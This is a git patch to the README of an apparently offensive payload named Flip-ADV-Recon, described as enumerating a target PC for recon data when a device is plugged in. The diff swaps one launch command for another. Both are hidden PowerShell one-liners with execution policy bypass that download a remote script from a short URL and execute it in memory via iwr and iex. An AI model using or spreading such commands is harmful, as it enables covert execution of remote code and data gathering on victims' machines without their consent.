From 39f69a35ac595003c84696aa1603565033b13bff Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 13:47:36 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-ADV-Recon/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index 13646af..2cc8a44 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -56,7 +56,7 @@ This program enumerates a target PC to collect as much recon data as possible fo * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -Ep Bypass $db='';iwr rebrand.ly/9eegqdd | iex +powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex ```

(back to top)